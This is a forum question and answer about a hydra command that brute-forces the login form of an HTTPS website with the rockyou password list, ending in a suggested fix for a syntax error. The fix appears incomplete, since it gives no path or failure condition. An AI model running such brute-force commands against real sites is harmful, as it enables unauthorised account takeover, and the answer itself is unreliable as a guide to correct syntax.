httpspenetration-testinghydrapenetration-tools

hydra brute force password https


i am having some trouble brute forcing a password on a website in https. this is the command that i'm using:

hydra -l email -P /path/rockyou.txt WEBSITE_IP  http-post-form “_token=6UZ59LAb1LAKF4Z4sdKXGXBMiquzBWYK5tqG6Wwr&email=^USER^&password=^PASS^”

but every time i'm starting the process comes out an error message:

[ERROR] optional parameter must start with a '/' slash!

maybe I using some wrong parameters but i don't know how to proceed. i'm doing the test on a website in https to check the vulnerabilities and it's first time using hydra, so if you can also link a website where to learn hydra and other tool more it would be very helpful.


Solution

  • You just need to add slash '/' in your parameter. Use this command

    hydra -l email -P /path/rockyou.txt WEBSITE_IP  http-post-form
    “/_token=6UZ59LAb1LAKF4Z4sdKXGXBMiquzBWYK5tqG6Wwr&email=^USER^&password=^PASS^”